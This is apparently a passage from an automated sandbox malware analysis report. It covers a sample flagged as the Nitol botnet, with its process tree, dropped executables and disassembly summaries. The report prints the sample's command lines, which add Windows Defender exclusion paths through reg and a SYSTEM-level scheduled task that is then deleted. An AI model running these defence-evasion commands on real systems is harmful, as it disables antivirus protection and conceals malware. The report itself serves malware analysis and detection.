Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	06:15:15
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff7b6450000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	06:15:15
Start date:	02/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff604930000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	06:15:15
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	06:15:15
Start date:	02/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff779400000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	06:15:15
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff7b6450000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	06:15:16
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	06:15:16
Start date:	02/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff604930000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	06:15:16
Start date:	02/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff604930000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	06:15:16
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff7b6450000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	06:15:16
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	06:15:16
Start date:	02/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff604930000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	06:15:16
Start date:	02/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff779400000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	06:15:47
Start date:	02/01/2025
Path:	C:\Program Files (x86)\Twhtlb\Twhtlb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Twhtlb\Twhtlb.exe"
Imagebase:	0xf60000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	41
Start time:	06:15:50
Start date:	02/01/2025
Path:	C:\Program Files (x86)\Twhtlb\Twhtlb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Twhtlb\Twhtlb.exe"
Imagebase:	0xf60000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	06:15:50
Start date:	02/01/2025
Path:	C:\Program Files (x86)\K5YQV85\6WWeC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\K5YQV85\6WWeC.exe"
Imagebase:	0x520000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	06:15:51
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c echo.>c:\xxxx.ini
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	06:15:51
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	06:15:51
Start date:	02/01/2025
Path:	C:\Program Files (x86)\Twhtlb\Twhtlb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Twhtlb\Twhtlb.exe"
Imagebase:	0xf60000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	06:16:01
Start date:	02/01/2025
Path:	C:\Program Files (x86)\Twhtlb\Twhtlb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Twhtlb\Twhtlb.exe"
Imagebase:	0xf60000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	06:16:01
Start date:	02/01/2025
Path:	C:\Program Files (x86)\K5YQV85\6WWeC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\K5YQV85\6WWeC.exe"
Imagebase:	0x520000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	30.8%
Total number of Nodes:	480
Total number of Limit Nodes:	7

Executed Functions

Function 0000000140006C95 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 0000000140006D6C
@, xrefs: 0000000140006FA2

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00

Function 00000001400073E0 Relevance: 1.6, APIs: 1, Instructions: 121
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL ref: 00000001400073E2

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00

Function 0000000140005DF3 Relevance: 54.3, APIs: 3, Strings: 28, Instructions: 79
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE ref: 0000000140005F30
malloc.MSVCRT ref: 0000000140005FD3
ReadFile.KERNELBASE ref: 0000000140006016

Strings

p, xrefs: 0000000140005EB1
a, xrefs: 0000000140005EE9
d, xrefs: 0000000140005F7D
s, xrefs: 0000000140005EA1
s, xrefs: 0000000140005F5F
M, xrefs: 0000000140005E99
., xrefs: 0000000140005ED9
a, xrefs: 0000000140005F96
s, xrefs: 0000000140005EC9
i, xrefs: 0000000140005EC1
t, xrefs: 0000000140005ED1
., xrefs: 0000000140005F78
l, xrefs: 0000000140005F9B
o, xrefs: 0000000140005FA5
r, xrefs: 0000000140005F6E
m, xrefs: 0000000140005F5A
L, xrefs: 0000000140005EB9
l, xrefs: 0000000140005FA0
c, xrefs: 0000000140005FAA
l, xrefs: 0000000140005F82
c, xrefs: 0000000140005F69
t, xrefs: 0000000140005F73
t, xrefs: 0000000140005EF1
v, xrefs: 0000000140005F64
d, xrefs: 0000000140005EE1
m, xrefs: 0000000140005F91
M, xrefs: 0000000140005EA9
l, xrefs: 0000000140005F87

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: File$CreateReadmalloc
String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
API String ID: 3950102678-3381721293
Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22

Function 00007FFDA55D1C00 Relevance: 12.2, APIs: 8, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFDA55D1C28
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFDA55D1C7A
_RTC_Initialize.LIBCMT ref: 00007FFDA55D1CA8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFDA55D1CCE
__scrt_release_startup_lock.LIBCMT ref: 00007FFDA55D1CF9

Memory Dump Source

Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
Instruction ID: 030d88ee8f052d777e638447d6baf7762fb5673959dac9b1ebfbd6256528a745
Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
Instruction Fuzzy Hash: DE819D2BF0A68FCAFA56EF6594613792690AF47F80F044035E90C477A7DE3CE8558718

Function 00007FFDA55D1720 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNEL32 ref: 00007FFDA55D1753
FreeLibrary.KERNEL32 ref: 00007FFDA55D1981

Part of subcall function 00007FFDA55D1B90: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDA55D1BC0
Part of subcall function 00007FFDA55D1B90: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDA55D1BC6

Part of subcall function 00007FFDA55D1720: FindFirstFileA.KERNELBASE ref: 00007FFDA55D1536

Strings

WordpadFilter.db, xrefs: 00007FFDA55D1527

Memory Dump Source

Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd

Similarity

API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
String ID: WordpadFilter.db
API String ID: 868324331-3647581008
Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
Instruction ID: d6621eeece0dbc710acb7ee6707ed5e11344b388319d92d07dd59d1a704a99ff
Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
Instruction Fuzzy Hash: A9315C37B16B85C9E701CFA1D8503AD73A5EB89B88F144535EE8D13B49EE38D161C344

Function 00007FFDA55D11B0 Relevance: 3.2, APIs: 2, Instructions: 235
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFDA55D14EB
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDA55D14F7

Memory Dump Source

Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 73155330-0
Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
Instruction ID: 52acbf1e1485903e3672c4087bfcd351f8559cc8d23f7817ea631a0eca8ec378
Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
Instruction Fuzzy Hash: FC812927F1A6CA89E612CF3598102B9A694EF57FC4F148335EE9957793EE3CE0918304

Non-executed Functions

Function 0000000140001A30 Relevance: 37.9, APIs: 30, Instructions: 422memorystringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140001AA6
LeaveCriticalSection.KERNEL32 ref: 0000000140001B30
EnterCriticalSection.KERNEL32 ref: 0000000140001B48
LeaveCriticalSection.KERNEL32 ref: 0000000140001BC9
EnterCriticalSection.KERNEL32 ref: 0000000140001BE6
LeaveCriticalSection.KERNEL32 ref: 0000000140001C67
EnterCriticalSection.KERNEL32 ref: 0000000140001C84
LeaveCriticalSection.KERNEL32 ref: 0000000140001D0D
lstrlenW.KERNEL32 ref: 0000000140001D1F
GetProcessHeap.KERNEL32 ref: 0000000140001D2E
HeapAlloc.KERNEL32 ref: 0000000140001D3C
EnterCriticalSection.KERNEL32 ref: 0000000140001D6F
LeaveCriticalSection.KERNEL32 ref: 0000000140001DF0
lstrlenW.KERNEL32 ref: 0000000140001DFF
GetProcessHeap.KERNEL32 ref: 0000000140001E0E
HeapAlloc.KERNEL32 ref: 0000000140001E1C
EnterCriticalSection.KERNEL32 ref: 0000000140001E4F
LeaveCriticalSection.KERNEL32 ref: 0000000140001ED0
EnterCriticalSection.KERNEL32 ref: 0000000140001EED
LeaveCriticalSection.KERNEL32 ref: 0000000140001F6E
lstrlenW.KERNEL32 ref: 0000000140001F7D
GetProcessHeap.KERNEL32 ref: 0000000140001F8C
HeapAlloc.KERNEL32 ref: 0000000140001F9A
EnterCriticalSection.KERNEL32 ref: 0000000140001FCD
LeaveCriticalSection.KERNEL32 ref: 000000014000204E
lstrlenW.KERNEL32 ref: 000000014000205D
GetProcessHeap.KERNEL32 ref: 000000014000206C
HeapAlloc.KERNEL32 ref: 000000014000207A
EnterCriticalSection.KERNEL32 ref: 00000001400020B4
LeaveCriticalSection.KERNEL32 ref: 000000014000214E

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
String ID:
API String ID: 3526400053-0
Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740

Function 0000000140003F80 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 160timeCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
OpenProcessToken.ADVAPI32 ref: 0000000140004007
GetLastError.KERNEL32 ref: 0000000140004011
LookupPrivilegeValueW.ADVAPI32 ref: 000000014000403A
AdjustTokenPrivileges.ADVAPI32 ref: 0000000140004080
GetLastError.KERNEL32 ref: 000000014000408A
CloseHandle.KERNEL32 ref: 0000000140004095
EnterCriticalSection.KERNEL32 ref: 00000001400040B3
LeaveCriticalSection.KERNEL32 ref: 000000014000412B
GetVersionExW.KERNEL32 ref: 0000000140004155
RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
RpcServerListen.RPCRT4 ref: 00000001400041D3
CreateWaitableTimerW.KERNEL32 ref: 0000000140004205
CreateEventW.KERNEL32 ref: 000000014000421C
SetWaitableTimer.KERNEL32 ref: 0000000140004289

Strings

null, xrefs: 0000000140003FCE
ampStartSingletone: logging started, settins=%s, xrefs: 0000000140003FD5
SeLoadDriverPrivilege, xrefs: 000000014000402A

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
API String ID: 3408796845-4213300970
Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44

Function 00000001400042B0 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 59synchronizationtimethreadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
#4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
#4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6

Strings

ampStopSingletone: logging ended, xrefs: 00000001400043B2

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
String ID: ampStopSingletone: logging ended
API String ID: 2048888615-3533855269
Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744

